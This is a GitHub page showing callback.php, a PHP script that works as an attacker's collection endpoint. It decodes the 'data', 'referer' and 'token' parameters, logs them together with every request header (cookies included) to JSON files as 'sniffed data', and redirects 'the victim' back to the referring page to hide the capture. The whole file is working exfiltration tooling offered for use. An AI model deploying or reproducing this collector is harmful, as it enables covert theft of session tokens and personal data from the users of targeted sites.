-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcallback.php
More file actions
60 lines (47 loc) · 1.59 KB
/
callback.php
File metadata and controls
60 lines (47 loc) · 1.59 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
/* Variables */
// Set the panic address to redirect the client to if they don't provide a valid referer address.
$panic = "https://www.google.com/";
$new_location;
$callback = [
"data" => base64_decode($_GET["data"]),
"referer" => base64_decode($_GET["referer"]),
"token" => base64_decode($_GET["token"]),
"headers" => getallheaders(),
"timestamp" => date( "Y-m-d H:i:s", time() )
];
/* Functions */
function randomString($length) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$buff = "";
while ( strlen($buff) < $length ) {
$index = rand( 0, ( strlen($chars) - 1 ) );
$buff .= $chars[$index];
}
return $buff;
}
/* Events */
// Save sniffed data.
try {
file_put_contents( "./callback-" . randomString(9) . ".json", json_encode($callback, true) );
} catch (Exception $ignore) {}
// Check if valid referer is provided.
if ( preg_match_all("/http[s]?:\/\/[a-z0-9]/i", $callback["referer"]) ) {
$new_location = $callback["referer"];
} else if ( preg_match_all("/http[s]?:\/\/[a-z0-9]/i", $callback["headers"]["Referer"]) ) {
$new_location = $callback["headers"]["Referer"];
} else {
$new_location = $panic;
}
// Add token to referer address.
if ($new_location != $panic) {
if ( preg_match_all("/#.*$/", $new_location ) ) {
$new_location = preg_replace("/#.*$/", "#" . $callback["token"], $new_location);
} else {
$new_location .= "#" . $callback["token"];
}
}
// Redirect the victim.
http_response_code(301);
header("Location: " . $new_location);
?>